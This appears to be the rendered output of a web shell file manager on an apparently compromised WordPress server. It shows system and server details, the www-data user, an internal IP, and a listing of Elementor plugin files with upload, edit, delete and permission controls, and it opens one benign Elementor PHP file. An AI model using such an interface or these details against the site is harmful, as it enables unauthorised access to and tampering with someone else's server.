[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
modules
/
atomic-widgets
/
elements
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 atomic-button
SET
[ DEL ]
📁 atomic-divider
SET
[ DEL ]
📁 atomic-form
SET
[ DEL ]
📁 atomic-heading
SET
[ DEL ]
📁 atomic-image
SET
[ DEL ]
📁 atomic-paragraph
SET
[ DEL ]
📁 atomic-self-hosted-video
SET
[ DEL ]
📁 atomic-svg
SET
[ DEL ]
📁 atomic-tabs
SET
[ DEL ]
📁 atomic-youtube
SET
[ DEL ]
📁 base
SET
[ DEL ]
📁 div-block
SET
[ DEL ]
📁 flexbox
SET
[ DEL ]
📁 loader
SET
[ DEL ]
📁 template-renderer
SET
[ DEL ]
📄 atomic-element-base.php
6,855 B
SET
[ EDIT ]
|
[ DEL ]
📄 atomic-widget-base.php
2,934 B
SET
[ EDIT ]
|
[ DEL ]
📄 element-builder.php
1,111 B
SET
[ EDIT ]
|
[ DEL ]
📄 has-atomic-base.php
12,694 B
SET
[ EDIT ]
|
[ DEL ]
📄 has-base-styles.php
1,079 B
SET
[ EDIT ]
|
[ DEL ]
📄 has-template.php
3,907 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget-builder.php
971 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: has-base-styles.php
<?php namespace Elementor\Modules\AtomicWidgets\Elements; use Elementor\Core\Utils\Collection; use Elementor\Modules\AtomicWidgets\Styles\Style_Definition; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * @mixin Has_Atomic_Base */ trait Has_Base_Styles { public function get_base_styles() { $base_styles = $this->define_base_styles(); $style_definitions = []; foreach ( $base_styles as $key => $style ) { $id = $this->generate_base_style_id( $key ); $style_definitions[ $id ] = $style->build( $id ); } return $style_definitions; } public function get_base_styles_dictionary() { $result = []; $base_styles = array_keys( $this->define_base_styles() ); foreach ( $base_styles as $key ) { $result[ $key ] = $this->generate_base_style_id( $key ); } return $result; } private function generate_base_style_id( string $key ): string { return static::get_element_type() . '-' . $key; } /** * @return array<string, Style_Definition> */ protected function define_base_styles(): array { return []; } }